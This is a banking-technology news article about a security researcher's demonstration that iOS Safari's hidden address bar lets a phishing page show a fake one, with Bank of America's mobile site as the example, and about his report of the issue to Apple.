Bank Systems & Technology is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them. Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Channels

11:45 AM
Matt Gunn
Connect Directly
RSS
E-Mail
50%
50%

Researcher Shows How Fraudsters Might Use iOS Browser Loophole to Fool Users

A loophole in how some mobile browsers display website address bars could represent an opportunity for fraudsters to trick users into believing they are visiting a trusted site.

A loophole in how some mobile browsers display website address bars could represent an opportunity for fraudsters to trick users into believing they are visiting a trusted site.

Security researcher Nitesh Dhanjani demonstrates in a blog post for computer security training group SANS, using Bank of America's mobile banking site on iOS as a reference. Because Safari browser on iOS will "hide" the address bar of certain sites coded in HTML as mobile, Dhanjani demonstrates how simply inserting a fake address bar at the top of a page could be sufficient bait to make unsuspecting users think they are looking at the real thing.

A video demonstration follows:

If you watch closely, you'll see that Safari does show the real address bar while the site is loading. Presumably if the user is not paying close attention while the site loads, they might miss this detail. While scrolling up on the mobile page will also reveal the con, a person who is quickly logging in to their bank account might not think to check this. A trusted site is a trusted site. Of course, once they enter their username and password, it potentially gives fraudsters a chance to do some damage.

As Dhanjani explains:

Popular web browsers today do not allow arbitrary websites to modify the text displayed in the address bar or to hide the address bar (some browsers may allow popups to hide the address bar but in such cases the URL is then displayed in the title of the window). The reasoning behind this behavior is quite simple: if browsers can be influenced by arbitrary web applications to hide the URL or to modify how it is displayed, then malicious web applications can spoof User Interface elements to display arbitrary URLs thus tricking the user to thinking he or she is browsing a trusted site.

He notes in his blog post that he contacted Apple regarding the issue, and that the company is aware of the potential implications. Apple did not tell Dhanjani how or when they would address the issue.

Register for Bank Systems & Technology Newsletters
Slideshows
More Slideshows
Video
All Videos
Bank Systems & Technology Radio
Archived Audio Interviews
Join Bank Systems & Technology Associate Editor Bryan Yurcan, and guests Karen Massey and Jerry Silva from IDC Financial Insights, for a conversation about the firm's 11th annual FinTech rankings.
FULL SCHEDULE | ARCHIVED SHOWS